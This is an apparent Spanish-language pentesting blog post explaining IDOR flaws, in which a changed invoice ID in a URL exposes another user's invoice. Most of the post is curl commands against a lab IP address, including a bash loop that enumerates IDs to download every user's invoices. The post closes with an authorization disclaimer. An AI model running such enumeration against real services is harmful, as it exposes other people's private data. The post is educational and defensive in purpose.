~ / blog / pentesting
KALI

IDOR: accede a datos ajenos

El IDOR es de los fallos más simples y más comunes: la web te da tu objeto por un identificador, pero no verifica que sea TUYO.

Ves tu factura en la url con un número, cambias ese número por otro, y ves la factura de otra persona. Automatizarlo con un bucle descarga los datos de todos los usuarios.

No hace falta hackear nada complejo, solo contar. Cada objeto debe verificar quién lo pide, siempre.

# los comandos

kali@kali:~$ curl -b 'session=mio' 'http://10.0.0.5/factura?id=1001'copiar
Factura de: TU usuario
kali@kali:~$ curl -b 'session=mio' 'http://10.0.0.5/factura?id=1002'copiar
Factura de: OTRO usuario!
kali@kali:~$ for i in $(seq 1000 1100); do curl -s -b 'session=mio' "http://10.0.0.5/factura?id=$i"; donecopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.